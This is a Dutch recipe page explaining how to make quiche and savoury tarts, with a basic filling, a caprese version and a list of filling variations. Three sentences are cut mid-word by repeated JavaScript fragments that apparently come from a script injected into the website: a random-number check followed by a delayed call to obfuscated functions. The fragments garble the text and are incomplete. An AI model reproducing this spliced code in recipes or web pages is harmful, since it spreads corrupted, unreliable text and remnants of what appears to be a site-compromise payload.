Eigenlijk is een quiche niet meer dan een open hartige taart, gemaakt met een bodem van meel, water en koude boter. Vaak worden de woorden quiche en hartige taart door elkaar gehaald, maar dit komt op hetzelfde neer. De basisvulling bestaat doorgaans uit een luchtig opgeklopt mengsel van eieren, kaas en room waaraan verschillende ingrediënten worden dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toegevoegd zoals vlees, vis en groenten. Met de vulling kun je eindeloos variëren zodat je altijd wat nieuws op tafel zet.
Maak je eigen bladerdeeg
Natuurlijk kun je voor het maken van een quiche kiezen voor blader- of hartige taartdeeg uit de diepvries. Maar wist je dat het maken van een eigen korstdeeg heel eenvoudig is? Volg gewoon onderstaand recept voor het deeg, dit kan bijna niet mislukken.
Voor de vulling van de quiche
Als je eenmaal een goed basis recept hebt dan kun je zelf je eigen variaties maken. Voor dit recept heb ik gekozen voor een caprese vulling met dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomaat, basilicum en mozzarella, maar wellicht zijn onderstaande combinaties ook iets voor jou. Denk bijvoorbeeld aan
- Verse zalm en dille
- Geitenkaas, rode ui en balsamico creme
- Gerookte kip en groene pesdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to
- Ham, prei en gekookte eieren
- Spinazie & Gehakt

Kun je geen genoeg krijgen van bakken? Kijk dan eens bij de andere bakrecepten.
Geen Reacties op "Quiche en hartige taarten basisrecept"